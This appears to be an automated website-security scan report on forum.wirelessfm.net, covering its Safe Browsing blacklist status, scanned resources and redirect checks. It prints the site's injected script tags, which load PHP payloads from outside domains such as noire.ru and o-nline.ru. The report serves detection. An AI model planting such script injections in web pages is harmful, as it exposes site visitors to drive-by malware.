Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=forum.wirelessfm.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://forum.wirelessfm.net/ | 200 OK Content-Length: 634 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: noire.ru <script type="text/javascript" src="http://mayertrans.at/mayer_old/v2bjtj6g.php"></script><script type="text/javascript" src="http://noire.ru/nkxq8tbp.php"></script><script type="text/javascript" src="http://o-nline.ru/fmp237vn.php"></script><script type="text/javascript" src="http://noire.ru/nkxq8tbp.php"></script><script type="text/javascript" src="http://o-nline.ru/fmp237vn.php"></script><script type="text/javascript" src="http://noire.ru/nkxq8tbp.php"></script><script type="text/javascript" src="http://noire.ru/nkxq8tbp.php"></script><script type="text/javascript" src="http://mayertrans.at/mayer_old/v2bjtj6g.php"></script> | ||
http://mayertrans.at/mayer_old/v2bjtj6g.php | 404 Not Found Content-Length: 283 Content-Type: text/html | clean |
http://mayertrans.at/test404page.js | 404 Not Found Content-Length: 275 Content-Type: text/html | clean |
http://noire.ru/nkxq8tbp.php | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Dec 2014 19:57:25 GMT Location: http://localhost/ Server: nginx/1.0.6 Content-Type: text/html; charset=windows-1251 X-Powered-By: PHP/5.2.10 | clean |
http://localhost/ | 200 OK Content-Length: 3883 Content-Type: text/html | clean |
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 10550 Content-Type: text/javascript | clean |
http://noire.ru/terms.html | 404 Not Found Content-Length: 1411 Content-Type: text/html | clean |
http://noire.ru/ | 200 OK Content-Length: 2745 Content-Type: text/html | clean |
http://noire.ru/AC_RunActiveContent.js | 200 OK Content-Length: 8321 Content-Type: application/x-javascript | clean |
http://noire.ru/privacy.html | 404 Not Found Content-Length: 1411 Content-Type: text/html | clean |
http://o-nline.ru/fmp237vn.php | 200 OK Content-Length: 58725 Content-Type: text/html | clean |
http://o-nline.ru/engine/classes/js/jquery.js | 200 OK Content-Length: 93636 Content-Type: application/x-javascript | clean |
http://o-nline.ru/engine/classes/js/jqueryui.js | 200 OK Content-Length: 75927 Content-Type: application/x-javascript | clean |
http://o-nline.ru/engine/classes/js/dle_js.js | 200 OK Content-Length: 23054 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js | 200 OK Content-Length: 17480 Content-Type: text/javascript | clean |
http://o-nline.ru/engine/editor/scripts/webfont.js | 200 OK Content-Length: 3019 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: forum.wirelessfm.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 19:57:19 GMT
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips DAV/2 mod_mono/2.6.3 mod_jk/1.2.37 mod_bwlimited/1.4 mod_perl/2.0.8 Perl/v5.10.1
Content-Type: text/html
X-Died: timeout at scan.pm line 1566.
X-Powered-By: PHP/5.4.35
GET / HTTP/1.1
Host: forum.wirelessfm.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 19:57:19 GMT
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips DAV/2 mod_mono/2.6.3 mod_jk/1.2.37 mod_bwlimited/1.4 mod_perl/2.0.8 Perl/v5.10.1
Content-Type: text/html
X-Died: timeout at scan.pm line 1566.
X-Powered-By: PHP/5.4.35
Second query (visit from search engine):
GET / HTTP/1.1
Host: forum.wirelessfm.net
Referer: http://www.google.com/search?q=forum.wirelessfm.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: forum.wirelessfm.net
Referer: http://www.google.com/search?q=forum.wirelessfm.net
Result:
The result is similar to the first query. There are no suspicious redirects found.